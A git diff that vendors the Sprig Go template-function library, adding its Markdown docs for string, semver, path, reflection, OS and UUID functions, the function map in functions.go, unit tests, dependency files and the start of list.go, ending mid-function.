b/vendor/github.com/Masterminds/sprig/docs/os.md @@ -0,0 +1,24 @@ +# OS Functions + +_WARNING:_ These functions can lead to information leakage if not used +appropriately. + +_WARNING:_ Some notable implementations of Sprig (such as +[Kubernetes Helm](http://helm.sh) _do not provide these functions for security +reasons_. 
+ +## env + +The `env` function reads an environment variable: + +``` +env "HOME" +``` + +## expandenv + +To substitute environment variables in a string, use `expandenv`: + +``` +expandenv "Your path is set to $PATH" +``` diff --git a/vendor/github.com/Masterminds/sprig/docs/paths.md b/vendor/github.com/Masterminds/sprig/docs/paths.md new file mode 100644 index 0000000000..87ec6d45a2 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/paths.md @@ -0,0 +1,43 @@ +# File Path Functions + +While Sprig does not grant access to the filesystem, it does provide functions +for working with strings that follow file path conventions. + +# base + +Return the last element of a path. + +``` +base "foo/bar/baz" +``` + +The above prints "baz" + +# dir + +Return the directory, stripping the last part of the path. So `dir "foo/bar/baz"` +returns `foo/bar` + +# clean + +Clean up a path. + +``` +clean "foo/bar/../baz" +``` + +The above resolves the `..` and returns `foo/baz` + +# ext + +Return the file extension. + +``` +ext "foo.bar" +``` + +The above returns `.bar`. + +# isAbs + +To check whether a file path is absolute, use `isAbs`. diff --git a/vendor/github.com/Masterminds/sprig/docs/reflection.md b/vendor/github.com/Masterminds/sprig/docs/reflection.md new file mode 100644 index 0000000000..597871f3c5 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/reflection.md @@ -0,0 +1,38 @@ +# Reflection Functions + +Sprig provides rudimentary reflection tools. These help advanced template +developers understand the underlying Go type information for a particular value. + +Go has several primitive _kinds_, like `string`, `slice`, `int64`, and `bool`. + +Go has an open _type_ system that allows developers to create their own types. + +Sprig provides a set of functions for each. + +## Kind Functions + +There are two Kind functions: `kindOf` returns the kind of an object. + +``` +kindOf "hello" +``` + +The above would return `string`. 
For simple tests (like in `if` blocks), the
+`kindIs` function will let you verify that a value is a particular kind:
+
+```
+kindIs "int" 123
+```
+
+The above will return `true`
+
+## Type Functions
+
+Types are slightly harder to work with, so there are three different functions:
+
+- `typeOf` returns the underlying type of a value: `typeOf $foo`
+- `typeIs` is like `kindIs`, but for types: `typeIs "*io.Buffer" $myVal`
+- `typeIsLike` works as `kindIs`, except that it also dereferences pointers.
+
+**Note:** None of these can test whether or not something implements a given
+interface, since doing so would require compiling the interface in ahead of time.
diff --git a/vendor/github.com/Masterminds/sprig/docs/semver.md b/vendor/github.com/Masterminds/sprig/docs/semver.md
new file mode 100644
index 0000000000..e0cbfeb7ae
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/semver.md
@@ -0,0 +1,124 @@
+# Semantic Version Functions
+
+Some version schemes are easily parseable and comparable. Sprig provides functions
+for working with [SemVer 2](http://semver.org) versions.
+
+## semver
+
+The `semver` function parses a string into a Semantic Version:
+
+```
+$version := semver "1.2.3-alpha.1+123"
+```
+
+_If the parser fails, it will cause template execution to halt with an error._
+
+At this point, `$version` is a pointer to a `Version` object with the following
+properties:
+
+- `$version.Major`: The major number (`1` above)
+- `$version.Minor`: The minor number (`2` above)
+- `$version.Patch`: The patch number (`3` above)
+- `$version.Prerelease`: The prerelease (`alpha.1` above)
+- `$version.Metadata`: The build metadata (`123` above)
+- `$version.Original`: The original version as a string
+
+Additionally, you can compare a `Version` to another `version` using the `Compare`
+function:
+
+```
+semver "1.4.3" | (semver "1.2.3").Compare
+```
+
+The above will return `-1`.
+ +The return values are: + +- `-1` if the given semver is greater than the semver whose `Compare` method was called +- `1` if the version who's `Compare` function was called is greater. +- `0` if they are the same version + +(Note that in SemVer, the `Metadata` field is not compared during version +comparison operations.) + + +## semverCompare + +A more robust comparison function is provided as `semverCompare`. This version +supports version ranges: + +- `semverCompare "1.2.3" "1.2.3"` checks for an exact match +- `semverCompare "^1.2.0" "1.2.3"` checks that the major and minor versions match, and that the patch + number of the second version is _greater than or equal to_ the first parameter. + +The SemVer functions use the [Masterminds semver library](https://github.com/Masterminds/semver), +from the creators of Sprig. + + +## Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + +* `=`: equal (aliased to no operator) +* `!=`: not equal +* `>`: greater than +* `<`: less than +* `>=`: greater than or equal to +* `<=`: less than or equal to + +_Note, according to the Semantic Version specification pre-releases may not be +API compliant with their release counterpart. It says,_ + +> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._ + +_SemVer comparisons without a pre-release value will skip pre-release versions. 
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphen ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the patch level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `<= 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparing API versions, as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/string_slice.md b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
new file mode 100644
index 0000000000..25643ec1c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
@@ -0,0 +1,55 @@
+# String Slice Functions
+
+These functions operate on or generate slices of strings.
In Go, a slice is a +growable array. In Sprig, it's a special case of a `list`. + +## join + +Join a list of strings into a single string, with the given separator. + +``` +list "hello" "world" | join "_" +``` + +The above will produce `hello_world` + +`join` will try to convert non-strings to a string value: + +``` +list 1 2 3 | join "+" +``` + +The above will produce `1+2+3` + +## splitList and split + +Split a string into a list of strings: + +``` +splitList "$" "foo$bar$baz" +``` + +The above will return `[foo bar baz]` + +The older `split` function splits a string into a `dict`. It is designed to make +it easy to use template dot notation for accessing members: + +``` +$a := split "$" "foo$bar$baz" +``` + +The above produces a map with index keys. `{_0: foo, _1: bar, _2: baz}` + +``` +$a._0 +``` + +The above produces `foo` + +## sortAlpha + +The `sortAlpha` function sorts a list of strings into alphabetical (lexicographical) +order. + +It does _not_ sort in place, but returns a sorted copy of the list, in keeping +with the immutability of lists. diff --git a/vendor/github.com/Masterminds/sprig/docs/strings.md b/vendor/github.com/Masterminds/sprig/docs/strings.md new file mode 100644 index 0000000000..8deb4cf6b0 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/strings.md @@ -0,0 +1,397 @@ +# String Functions + +Sprig has a number of string manipulation functions. + +## trim + +The `trim` function removes space from either side of a string: + +``` +trim " hello " +``` + +The above produces `hello` + +## trimAll + +Remove given characters from the front or back of a string: + +``` +trimAll "$" "$5.00" +``` + +The above returns `5.00` (as a string). 
+ +## trimSuffix + +Trim just the suffix from a string: + +``` +trimSuffix "-" "hello-" +``` + +The above returns `hello` + +## upper + +Convert the entire string to uppercase: + +``` +upper "hello" +``` + +The above returns `HELLO` + +## lower + +Convert the entire string to lowercase: + +``` +lower "HELLO" +``` + +The above returns `hello` + +## title + +Convert to title case: + +``` +title "hello world" +``` + +The above returns `Hello World` + +## untitle + +Remove title casing. `untitle "Hello World"` produces `hello world`. + +## repeat + +Repeat a string multiple times: + +``` +repeat 3 "hello" +``` + +The above returns `hellohellohello` + +## substr + +Get a substring from a string. It takes three parameters: + +- start (int) +- length (int) +- string (string) + +``` +substr 0 5 "hello world" +``` + +The above returns `hello` + +## nospace + +Remove all whitespace from a string. + +``` +nospace "hello w o r l d" +``` + +The above returns `helloworld` + +## trunc + +Truncate a string (and add no suffix) + +``` +trunc 5 "hello world" +``` + +The above produces `hello`. + +## abbrev + +Truncate a string with ellipses (`...`) + +Parameters: +- max length +- the string + +``` +abbrev 5 "hello world" +``` + +The above returns `he...`, since it counts the width of the ellipses against the +maximum length. + +## abbrevboth + +Abbreviate both sides: + +``` +abbrevboth 5 10 "1234 5678 9123" +``` + +the above produces `...5678...` + +It takes: + +- left offset +- max length +- the string + +## initials + +Given multiple words, take the first letter of each word and combine. 
+ +``` +initials "First Try" +``` + +The above returns `FT` + +## randAlphaNum, randAlpha, randNumeric, and randAscii + +These four functions generate random strings, but with different base character +sets: + +- `randAlphaNum` uses `0-9a-zA-Z` +- `randAlpha` uses `a-zA-Z` +- `randNumeric` uses `0-9` +- `randAscii` uses all printable ASCII characters + +Each of them takes one parameter: the integer length of the string. + +``` +randNumeric 3 +``` + +The above will produce a random string with three digits. + +## wrap + +Wrap text at a given column count: + +``` +wrap 80 $someText +``` + +The above will wrap the string in `$someText` at 80 columns. + +## wrapWith + +`wrapWith` works as `wrap`, but lets you specify the string to wrap with. +(`wrap` uses `\n`) + +``` +wrapWith 5 "\t" "Hello World" +``` + +The above produces `hello world` (where the whitespace is an ASCII tab +character) + +## contains + +Test to see if one string is contained inside of another: + +``` +contains "cat" "catch" +``` + +The above returns `true` because `catch` contains `cat`. + +## hasPrefix and hasSuffix + +The `hasPrefix` and `hasSuffix` functions test whether a string has a given +prefix or suffix: + +``` +hasPrefix "cat" "catch" +``` + +The above returns `true` because `catch` has the prefix `cat`. + +## quote and squote + +These functions wrap a string in double quotes (`quote`) or single quotes +(`squote`). + +## cat + +The `cat` function concatenates multiple strings together into one, separating +them with spaces: + +``` +cat "hello" "beautiful" "world" +``` + +The above produces `hello beautiful world` + +## indent + +The `indent` function indents every line in a given string to the specified +indent width. This is useful when aligning multi-line strings: + +``` +indent 4 $lots_of_text +``` + +The above will indent every line of text by 4 space characters. 
+ +## nindent + +The `nindent` function is the same as the indent function, but prepends a new +line to the beginning of the string. + +``` +nindent 4 $lots_of_text +``` + +The above will indent every line of text by 4 space characters and add a new +line to the beginning. + +## replace + +Perform simple string replacement. + +It takes three arguments: + +- string to replace +- string to replace with +- source string + +``` +"I Am Henry VIII" | replace " " "-" +``` + +The above will produce `I-Am-Henry-VIII` + +## plural + +Pluralize a string. + +``` +len $fish | plural "one anchovy" "many anchovies" +``` + +In the above, if the length of the string is 1, the first argument will be +printed (`one anchovy`). Otherwise, the second argument will be printed +(`many anchovies`). + +The arguments are: + +- singular string +- plural string +- length integer + +NOTE: Sprig does not currently support languages with more complex pluralization +rules. And `0` is considered a plural because the English language treats it +as such (`zero anchovies`). The Sprig developers are working on a solution for +better internationalization. + +## snakecase + +Convert string from camelCase to snake_case. + +Introduced in 2.12.0. + +``` +snakecase "FirstName" +``` + +This above will produce `first_name`. + +## camelcase + +Convert string from snake_case to CamelCase + +Introduced in 2.12.0. + +``` +camelcase "http_server" +``` + +This above will produce `HttpServer`. + +## shuffle + +Shuffle a string. + +Introduced in 2.12.0. + + +``` +shuffle "hello" +``` + +The above will randomize the letters in `hello`, perhaps producing `oelhl`. + +## regexMatch + +Returns true if the input string mratches the regular expression. 
+ +``` +regexMatch "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" "test@acme.com" +``` + +The above produces `true` + +## regexFindAll + +Returns a slice of all matches of the regular expression in the input string + +``` +regexFindAll "[2,4,6,8]" "123456789 +``` + +The above produces `[2 4 6 8]` + +## regexFind + +Return the first (left most) match of the regular expression in the input string + +``` +regexFind "[a-zA-Z][1-9]" "abcd1234" +``` + +The above produces `d1` + +## regexReplaceAll + +Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement. +Inside string replacement, $ signs are interpreted as in Expand, so for instance $1 represents the text of the first submatch + +``` +regexReplaceAll "a(x*)b" "-ab-axxb-" "${1}W" +``` + +The above produces `-W-xxW-` + +## regexReplaceAllLiteral + +Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement +The replacement string is substituted directly, without using Expand + +``` +regexReplaceAllLiteral "a(x*)b" "-ab-axxb-" "${1}" +``` + +The above produces `-${1}-${1}-` + +## regexSplit + +Slices the input string into substrings separated by the expression and returns a slice of the substrings between those expression matches. The last parameter `n` determines the number of substrings to return, where `-1` means return all matches + +``` +regexSplit "z+" "pizza" -1 +``` + +The above produces `[pi a]` + +## See Also... + +The [Conversion Functions](conversion.html) contain functions for converting +strings. The [String Slice Functions](string_slice.html) contains functions +for working with an array of strings. 
+ diff --git a/vendor/github.com/Masterminds/sprig/docs/uuid.md b/vendor/github.com/Masterminds/sprig/docs/uuid.md new file mode 100644 index 0000000000..1b57a330a9 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/uuid.md @@ -0,0 +1,9 @@ +# UUID Functions + +Sprig can generate UUID v4 universally unique IDs. + +``` +uuidv4 +``` + +The above returns a new UUID of the v4 (randomly generated) type. diff --git a/vendor/github.com/Masterminds/sprig/example_test.go b/vendor/github.com/Masterminds/sprig/example_test.go new file mode 100644 index 0000000000..2d7696bf9e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/example_test.go @@ -0,0 +1,25 @@ +package sprig + +import ( + "fmt" + "os" + "text/template" +) + +func Example() { + // Set up variables and template. + vars := map[string]interface{}{"Name": " John Jacob Jingleheimer Schmidt "} + tpl := `Hello {{.Name | trim | lower}}` + + // Get the Sprig function map. + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + + err := t.Execute(os.Stdout, vars) + if err != nil { + fmt.Printf("Error during template execution: %s", err) + return + } + // Output: + // Hello john jacob jingleheimer schmidt +} diff --git a/vendor/github.com/Masterminds/sprig/flow_control_test.go b/vendor/github.com/Masterminds/sprig/flow_control_test.go new file mode 100644 index 0000000000..d4e5ebf03f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/flow_control_test.go @@ -0,0 +1,16 @@ +package sprig + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestFail(t *testing.T) { + const msg = "This is an error!" 
+ tpl := fmt.Sprintf(`{{fail "%s"}}`, msg) + _, err := runRaw(tpl, nil) + assert.Error(t, err) + assert.Contains(t, err.Error(), msg) +} diff --git a/vendor/github.com/Masterminds/sprig/functions.go b/vendor/github.com/Masterminds/sprig/functions.go new file mode 100644 index 0000000000..f0d1bc12c1 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/functions.go @@ -0,0 +1,281 @@ +package sprig + +import ( + "errors" + "html/template" + "os" + "path" + "strconv" + "strings" + ttemplate "text/template" + "time" + + util "github.com/aokoli/goutils" + "github.com/huandu/xstrings" +) + +// Produce the function map. +// +// Use this to pass the functions into the template engine: +// +// tpl := template.New("foo").Funcs(sprig.FuncMap())) +// +func FuncMap() template.FuncMap { + return HtmlFuncMap() +} + +// HermeticTextFuncMap returns a 'text/template'.FuncMap with only repeatable functions. +func HermeticTxtFuncMap() ttemplate.FuncMap { + r := TxtFuncMap() + for _, name := range nonhermeticFunctions { + delete(r, name) + } + return r +} + +// HermeticHtmlFuncMap returns an 'html/template'.Funcmap with only repeatable functions. +func HermeticHtmlFuncMap() template.FuncMap { + r := HtmlFuncMap() + for _, name := range nonhermeticFunctions { + delete(r, name) + } + return r +} + +// TextFuncMap returns a 'text/template'.FuncMap +func TxtFuncMap() ttemplate.FuncMap { + return ttemplate.FuncMap(GenericFuncMap()) +} + +// HtmlFuncMap returns an 'html/template'.Funcmap +func HtmlFuncMap() template.FuncMap { + return template.FuncMap(GenericFuncMap()) +} + +// GenericFuncMap returns a copy of the basic function map as a map[string]interface{}. +func GenericFuncMap() map[string]interface{} { + gfm := make(map[string]interface{}, len(genericMap)) + for k, v := range genericMap { + gfm[k] = v + } + return gfm +} + +// These functions are not guaranteed to evaluate to the same result for given input, because they +// refer to the environemnt or global state. 
+var nonhermeticFunctions = []string{ + // Date functions + "date", + "date_in_zone", + "date_modify", + "now", + "htmlDate", + "htmlDateInZone", + "dateInZone", + "dateModify", + + // Strings + "randAlphaNum", + "randAlpha", + "randAscii", + "randNumeric", + "uuidv4", + + // OS + "env", + "expandenv", +} + +var genericMap = map[string]interface{}{ + "hello": func() string { return "Hello!" }, + + // Date functions + "date": date, + "date_in_zone": dateInZone, + "date_modify": dateModify, + "now": func() time.Time { return time.Now() }, + "htmlDate": htmlDate, + "htmlDateInZone": htmlDateInZone, + "dateInZone": dateInZone, + "dateModify": dateModify, + "ago": dateAgo, + "toDate": toDate, + + // Strings + "abbrev": abbrev, + "abbrevboth": abbrevboth, + "trunc": trunc, + "trim": strings.TrimSpace, + "upper": strings.ToUpper, + "lower": strings.ToLower, + "title": strings.Title, + "untitle": untitle, + "substr": substring, + // Switch order so that "foo" | repeat 5 + "repeat": func(count int, str string) string { return strings.Repeat(str, count) }, + // Deprecated: Use trimAll. 
+ "trimall": func(a, b string) string { return strings.Trim(b, a) }, + // Switch order so that "$foo" | trimall "$" + "trimAll": func(a, b string) string { return strings.Trim(b, a) }, + "trimSuffix": func(a, b string) string { return strings.TrimSuffix(b, a) }, + "trimPrefix": func(a, b string) string { return strings.TrimPrefix(b, a) }, + "nospace": util.DeleteWhiteSpace, + "initials": initials, + "randAlphaNum": randAlphaNumeric, + "randAlpha": randAlpha, + "randAscii": randAscii, + "randNumeric": randNumeric, + "swapcase": util.SwapCase, + "shuffle": xstrings.Shuffle, + "snakecase": xstrings.ToSnakeCase, + "camelcase": xstrings.ToCamelCase, + "wrap": func(l int, s string) string { return util.Wrap(s, l) }, + "wrapWith": func(l int, sep, str string) string { return util.WrapCustom(str, l, sep, true) }, + // Switch order so that "foobar" | contains "foo" + "contains": func(substr string, str string) bool { return strings.Contains(str, substr) }, + "hasPrefix": func(substr string, str string) bool { return strings.HasPrefix(str, substr) }, + "hasSuffix": func(substr string, str string) bool { return strings.HasSuffix(str, substr) }, + "quote": quote, + "squote": squote, + "cat": cat, + "indent": indent, + "nindent": nindent, + "replace": replace, + "plural": plural, + "sha1sum": sha1sum, + "sha256sum": sha256sum, + "toString": strval, + + // Wrap Atoi to stop errors. + "atoi": func(a string) int { i, _ := strconv.Atoi(a); return i }, + "int64": toInt64, + "int": toInt, + "float64": toFloat64, + + //"gt": func(a, b int) bool {return a > b}, + //"gte": func(a, b int) bool {return a >= b}, + //"lt": func(a, b int) bool {return a < b}, + //"lte": func(a, b int) bool {return a <= b}, + + // split "/" foo/bar returns map[int]string{0: foo, 1: bar} + "split": split, + "splitList": func(sep, orig string) []string { return strings.Split(orig, sep) }, + "toStrings": strslice, + + "until": until, + "untilStep": untilStep, + + // VERY basic arithmetic. 
+ "add1": func(i interface{}) int64 { return toInt64(i) + 1 }, + "add": func(i ...interface{}) int64 { + var a int64 = 0 + for _, b := range i { + a += toInt64(b) + } + return a + }, + "sub": func(a, b interface{}) int64 { return toInt64(a) - toInt64(b) }, + "div": func(a, b interface{}) int64 { return toInt64(a) / toInt64(b) }, + "mod": func(a, b interface{}) int64 { return toInt64(a) % toInt64(b) }, + "mul": func(a interface{}, v ...interface{}) int64 { + val := toInt64(a) + for _, b := range v { + val = val * toInt64(b) + } + return val + }, + "biggest": max, + "max": max, + "min": min, + "ceil": ceil, + "floor": floor, + "round": round, + + // string slices. Note that we reverse the order b/c that's better + // for template processing. + "join": join, + "sortAlpha": sortAlpha, + + // Defaults + "default": dfault, + "empty": empty, + "coalesce": coalesce, + "compact": compact, + "toJson": toJson, + "toPrettyJson": toPrettyJson, + "ternary": ternary, + + // Reflection + "typeOf": typeOf, + "typeIs": typeIs, + "typeIsLike": typeIsLike, + "kindOf": kindOf, + "kindIs": kindIs, + + // OS: + "env": func(s string) string { return os.Getenv(s) }, + "expandenv": func(s string) string { return os.ExpandEnv(s) }, + + // File Paths: + "base": path.Base, + "dir": path.Dir, + "clean": path.Clean, + "ext": path.Ext, + "isAbs": path.IsAbs, + + // Encoding: + "b64enc": base64encode, + "b64dec": base64decode, + "b32enc": base32encode, + "b32dec": base32decode, + + // Data Structures: + "tuple": list, // FIXME: with the addition of append/prepend these are no longer immutable. 
+ "list": list, + "dict": dict, + "set": set, + "unset": unset, + "hasKey": hasKey, + "pluck": pluck, + "keys": keys, + "pick": pick, + "omit": omit, + "merge": merge, + + "append": push, "push": push, + "prepend": prepend, + "first": first, + "rest": rest, + "last": last, + "initial": initial, + "reverse": reverse, + "uniq": uniq, + "without": without, + "has": has, + + // Crypto: + "genPrivateKey": generatePrivateKey, + "derivePassword": derivePassword, + "buildCustomCert": buildCustomCertificate, + "genCA": generateCertificateAuthority, + "genSelfSignedCert": generateSelfSignedCertificate, + "genSignedCert": generateSignedCertificate, + + // UUIDs: + "uuidv4": uuidv4, + + // SemVer: + "semver": semver, + "semverCompare": semverCompare, + + // Flow Control: + "fail": func(msg string) (string, error) { return "", errors.New(msg) }, + + // Regex + "regexMatch": regexMatch, + "regexFindAll": regexFindAll, + "regexFind": regexFind, + "regexReplaceAll": regexReplaceAll, + "regexReplaceAllLiteral": regexReplaceAllLiteral, + "regexSplit": regexSplit, +} diff --git a/vendor/github.com/Masterminds/sprig/functions_test.go b/vendor/github.com/Masterminds/sprig/functions_test.go new file mode 100644 index 0000000000..edf88a3255 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/functions_test.go @@ -0,0 +1,108 @@ +package sprig + +import ( + "bytes" + "fmt" + "math/rand" + "os" + "testing" + "text/template" + + "github.com/aokoli/goutils" + "github.com/stretchr/testify/assert" +) + +func TestEnv(t *testing.T) { + os.Setenv("FOO", "bar") + tpl := `{{env "FOO"}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } +} + +func TestExpandEnv(t *testing.T) { + os.Setenv("FOO", "bar") + tpl := `{{expandenv "Hello $FOO"}}` + if err := runt(tpl, "Hello bar"); err != nil { + t.Error(err) + } +} + +func TestBase(t *testing.T) { + assert.NoError(t, runt(`{{ base "foo/bar" }}`, "bar")) +} + +func TestDir(t *testing.T) { + assert.NoError(t, runt(`{{ dir "foo/bar/baz" }}`, 
"foo/bar")) +} + +func TestIsAbs(t *testing.T) { + assert.NoError(t, runt(`{{ isAbs "/foo" }}`, "true")) + assert.NoError(t, runt(`{{ isAbs "foo" }}`, "false")) +} + +func TestClean(t *testing.T) { + assert.NoError(t, runt(`{{ clean "/foo/../foo/../bar" }}`, "/bar")) +} + +func TestExt(t *testing.T) { + assert.NoError(t, runt(`{{ ext "/foo/bar/baz.txt" }}`, ".txt")) +} + +func TestSnakeCase(t *testing.T) { + assert.NoError(t, runt(`{{ snakecase "FirstName" }}`, "first_name")) + assert.NoError(t, runt(`{{ snakecase "HTTPServer" }}`, "http_server")) + assert.NoError(t, runt(`{{ snakecase "NoHTTPS" }}`, "no_https")) + assert.NoError(t, runt(`{{ snakecase "GO_PATH" }}`, "go_path")) + assert.NoError(t, runt(`{{ snakecase "GO PATH" }}`, "go_path")) + assert.NoError(t, runt(`{{ snakecase "GO-PATH" }}`, "go_path")) +} + +func TestCamelCase(t *testing.T) { + assert.NoError(t, runt(`{{ camelcase "http_server" }}`, "HttpServer")) + assert.NoError(t, runt(`{{ camelcase "_camel_case" }}`, "_CamelCase")) + assert.NoError(t, runt(`{{ camelcase "no_https" }}`, "NoHttps")) + assert.NoError(t, runt(`{{ camelcase "_complex__case_" }}`, "_Complex_Case_")) + assert.NoError(t, runt(`{{ camelcase "all" }}`, "All")) +} + +func TestShuffle(t *testing.T) { + goutils.RANDOM = rand.New(rand.NewSource(1)) + // Because we're using a random number generator, we need these to go in + // a predictable sequence: + assert.NoError(t, runt(`{{ shuffle "Hello World" }}`, "rldo HWlloe")) +} + +// runt runs a template and checks that the output exactly matches the expected string. +func runt(tpl, expect string) error { + return runtv(tpl, expect, map[string]string{}) +} + +// runtv takes a template, and expected return, and values for substitution. +// +// It runs the template and verifies that the output is an exact match. 
+func runtv(tpl, expect string, vars interface{}) error { + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + var b bytes.Buffer + err := t.Execute(&b, vars) + if err != nil { + return err + } + if expect != b.String() { + return fmt.Errorf("Expected '%s', got '%s'", expect, b.String()) + } + return nil +} + +// runRaw runs a template with the given variables and returns the result. +func runRaw(tpl string, vars interface{}) (string, error) { + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + var b bytes.Buffer + err := t.Execute(&b, vars) + if err != nil { + return "", err + } + return b.String(), nil +} diff --git a/vendor/github.com/Masterminds/sprig/glide.lock b/vendor/github.com/Masterminds/sprig/glide.lock new file mode 100644 index 0000000000..34afeb9c37 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/glide.lock @@ -0,0 +1,33 @@ +hash: 770b6a1132b743dadf6a0bb5fb8bf7083b1a5209f6d6c07826234ab2a97aade9 +updated: 2018-04-02T23:08:56.947456531+02:00 +imports: +- name: github.com/aokoli/goutils + version: 9c37978a95bd5c709a15883b6242714ea6709e64 +- name: github.com/google/uuid + version: 064e2069ce9c359c118179501254f67d7d37ba24 +- name: github.com/huandu/xstrings + version: 3959339b333561bf62a38b424fd41517c2c90f40 +- name: github.com/imdario/mergo + version: 7fe0c75c13abdee74b09fcacef5ea1c6bba6a874 +- name: github.com/Masterminds/goutils + version: 3391d3790d23d03408670993e957e8f408993c34 +- name: github.com/Masterminds/semver + version: 59c29afe1a994eacb71c833025ca7acf874bb1da +- name: github.com/stretchr/testify + version: e3a8ff8ce36581f87a15341206f205b1da467059 + subpackages: + - assert +- name: golang.org/x/crypto + version: d172538b2cfce0c13cee31e647d0367aa8cd2486 + subpackages: + - pbkdf2 + - scrypt +testImports: +- name: github.com/davecgh/go-spew + version: 5215b55f46b2b919f50a1df0eaa5886afe4e3b3d + subpackages: + - spew +- name: github.com/pmezard/go-difflib + version: 
d8ed2627bdf02c080bf22230dbb337003b7aba2d + subpackages: + - difflib diff --git a/vendor/github.com/Masterminds/sprig/glide.yaml b/vendor/github.com/Masterminds/sprig/glide.yaml new file mode 100644 index 0000000000..772ba91344 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/glide.yaml @@ -0,0 +1,15 @@ +package: github.com/Masterminds/sprig +import: +- package: github.com/Masterminds/goutils + version: ^1.0.0 +- package: github.com/google/uuid + version: ^0.2 +- package: golang.org/x/crypto + subpackages: + - scrypt +- package: github.com/Masterminds/semver + version: v1.2.2 +- package: github.com/stretchr/testify +- package: github.com/imdario/mergo + version: ~0.2.2 +- package: github.com/huandu/xstrings diff --git a/vendor/github.com/Masterminds/sprig/list.go b/vendor/github.com/Masterminds/sprig/list.go new file mode 100644 index 0000000000..1860549a94 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/list.go @@ -0,0 +1,259 @@ +package sprig + +import ( + "fmt" + "reflect" + "sort" +) + +// Reflection is used in these functions so that slices and arrays of strings, +// ints, and other types not implementing []interface{} can be worked with. +// For example, this is useful if you need to work on the output of regexs. + +func list(v ...interface{}) []interface{} { + return v +} + +func push(list interface{}, v interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[i] = l2.Index(i).Interface() + } + + return append(nl, v) + + default: + panic(fmt.Sprintf("Cannot push on type %s", tp)) + } +} + +func prepend(list interface{}, v interface{}) []interface{} { + //return append([]interface{}{v}, list...) 
+ + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[i] = l2.Index(i).Interface() + } + + return append([]interface{}{v}, nl...) + + default: + panic(fmt.Sprintf("Cannot prepend on type %s", tp)) + } +} + +func last(list interface{}) interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + return l2.Index(l - 1).Interface() + default: + panic(fmt.Sprintf("Cannot find last on type %s", tp)) + } +} + +func first(list interface{}) interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + return l2.Index(0).Interface() + default: + panic(fmt.Sprintf("Cannot find first on type %s", tp)) + } +} + +func rest(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + nl := make([]interface{}, l-1) + for i := 1; i < l; i++ { + nl[i-1] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find rest on type %s", tp)) + } +} + +func initial(list interface{}) []interface{} { + tp := 